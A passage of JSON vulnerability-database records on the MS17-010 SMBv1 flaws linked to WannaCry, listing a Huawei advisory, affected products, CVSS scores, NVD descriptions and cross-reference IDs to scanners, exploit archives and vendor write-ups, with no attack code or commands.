"SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2019-02-01T18:01:51", "rev": 2, "value": 6.1, "vector": "NONE"}}, "hash": "f60ec08b1e57c600c64d00418f03477296d59b1927c90693e0665c4a2d06a81d", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "ab4c23e37edfd222606da2fa8131cc0e", "key": "description"}, {"hash": "1fe6f9c53ed1ec89833f87f45ee6db6f", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "f3f172d109ebf206391628f4241045e7", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b027d2174bf77e8383f5629e4d766f25", "key": "title"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "8a3528e96f0013a96dd7340c6e13454e", "key": "affectedSoftware"}, {"hash": "8951f897adb3ace87288f35228ad9ab7", "key": "href"}, {"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "modified"}, {"hash": "c1aafc7e23f24ba11aae492f5caa2d97", "key": "type"}, {"hash": "7087ee65c2383d964726bbf1465730fc", "key": "published"}], "history": [], "href": 
"https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170513-01-windows-en", "id": "HUAWEI-SA-20170513-01-WINDOWS", "immutableFields": [], "lastseen": "2019-02-01T18:01:51", "modified": "2017-05-23T00:00:00", "objectVersion": "1.5", "published": "2017-05-13T00:00:00", "references": [], "reporter": "Huawei Technologies", "title": "Security Advisory - 'WannaCry ransomware' Vulnerabilities in Microsoft Windows Systems", "type": "huawei", "viewCount": 15}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-02-01T18:01:51"}, {"bulletin": {"bulletinFamily": "software", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-06-08T18:44:26", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], 
"type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", 
"MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-06-08T18:44:26", "rev": 2, "value": 6.1, "vector": "NONE"}}, "hash": "d888425aac868b4ee3209aa5565c0b2560b2a56eb57bda127d801bae85a290c6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "ab4c23e37edfd222606da2fa8131cc0e", "key": "description"}, {"hash": "1fe6f9c53ed1ec89833f87f45ee6db6f", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, 
{"hash": "f3f172d109ebf206391628f4241045e7", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b027d2174bf77e8383f5629e4d766f25", "key": "title"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "8951f897adb3ace87288f35228ad9ab7", "key": "href"}, {"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "modified"}, {"hash": "c1aafc7e23f24ba11aae492f5caa2d97", "key": "type"}, {"hash": "7087ee65c2383d964726bbf1465730fc", "key": "published"}], "history": [], "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170513-01-windows-en", "id": "HUAWEI-SA-20170513-01-WINDOWS", "immutableFields": [], "lastseen": "2021-06-08T18:44:26", "modified": "2017-05-23T00:00:00", "objectVersion": "1.5", "published": "2017-05-13T00:00:00", "references": [], "reporter": "Huawei Technologies", "title": "Security Advisory - 'WannaCry ransomware' Vulnerabilities in Microsoft Windows Systems", "type": "huawei", "viewCount": 15}, "different_elements": ["cvss3", "cvss2"], "edition": 2, "lastseen": "2021-06-08T18:44:26"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "f3f172d109ebf206391628f4241045e7"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "ab4c23e37edfd222606da2fa8131cc0e"}, {"key": "href", "hash": "8951f897adb3ace87288f35228ad9ab7"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "dfc20e0bc935ec49e080ba5d8f3ad837"}, {"key": "published", "hash": "7087ee65c2383d964726bbf1465730fc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", 
"hash": "1fe6f9c53ed1ec89833f87f45ee6db6f"}, {"key": "title", "hash": "b027d2174bf77e8383f5629e4d766f25"}, {"key": "type", "hash": "c1aafc7e23f24ba11aae492f5caa2d97"}], "hash": "81a9bcf0716f949753378d66c0f0703a0f15a8bf0bb1b3dec4ddd0bfe859cc6c", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": 
"openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": 
["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-06-08T18:44:26", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-06-08T18:44:26", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "\u25cfe6000 chassis", "operator": "eq", "version": "\u25cfRH2285H V2"}, {"name": "\u25cfbh622 v2", "operator": "eq", "version": "\u25cfHertz-W19"}, {"name": "18800v3", "operator": "eq", "version": "V300R003C10"}, {"name": "\u25cfch240", "operator": "eq", "version": "\u25cfRH2265 V2"}, {"name": "\u25cfes3000", "operator": "eq", "version": ""}, {"name": "oceanstor18500v3", "operator": "eq", "version": "V300R003C10"}, {"name": "\u25cfelog", "operator": "eq", "version": "\u25cfRH2288 V2"}, {"name": "\u25cfch121", "operator": "eq", "version": "\u25cfiNIC"}, {"name": "\u25cfch222", "operator": "eq", "version": "\u25cfRH1288A V2"}, {"name": "\u25cfch242 v3", "operator": "eq", "version": "\u25cfRH2285"}, {"name": "\u25cfch220", "operator": "eq", "version": "\u25cfN2000 Appliance"}, {"name": "\u25cfbh621 v2", "operator": "eq", "version": "\u25cfHertz-W09"}, {"name": "product name", "operator": "eq", "version": "Affected Version"}, {"name": "oceanstor18500", "operator": "eq", "version": "V100R001"}, {"name": "\u25cfbigdata appliance", "operator": "eq", "version": "\u25cfHuawei solutions for SAP HANA"}, {"name": "\u25cfch221", "operator": "eq", "version": "\u25cfRH1288 V2"}, {"name": "\u25cfe6000", "operator": "eq", "version": "\u25cfRH2285 V2"}, {"name": "oceanstor18500v3", "operator": "eq", "version": "V300R003C00"}, {"name": "18800f", "operator": "eq", "version": "V100R001"}, {"name": "18800v3", "operator": "eq", "version": 
"V300R003C20"}, {"name": "\u25cfch140", "operator": "eq", "version": "\u25cfL2800"}, {"name": "\u25cfbh620 v2", "operator": "eq", "version": "\u25cfFusionAccess"}, {"name": "oceanstor18500v3", "operator": "eq", "version": "V300R003C20"}, {"name": "\u25cfch242", "operator": "eq", "version": "\u25cfRH2268 V2"}, {"name": "\u25cfbh640 v2", "operator": "eq", "version": "\u25cfHertz-W29"}, {"name": "18800", "operator": "eq", "version": "V100R001"}, {"name": "18800v3", "operator": "eq", "version": "V300R003C00"}], "immutableFields": [], "scheme": null, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "cve": [{"id": "CVE-2017-0148", "bulletinFamily": "NVD", "title": "CVE-2017-0148", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, 
CVE-2017-0145, and CVE-2017-0146.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "reporter": "secure@microsoft.com", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0148"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", 
"KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 9.3, "vector": "NONE"}}, "hash": "5da130ba09e2b574b4cbbc13dfeecbae705318fbe1563859a574adcb5b15be09", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "dc7888ec5bcb36228c71cf6f35f01dee", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 49}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": 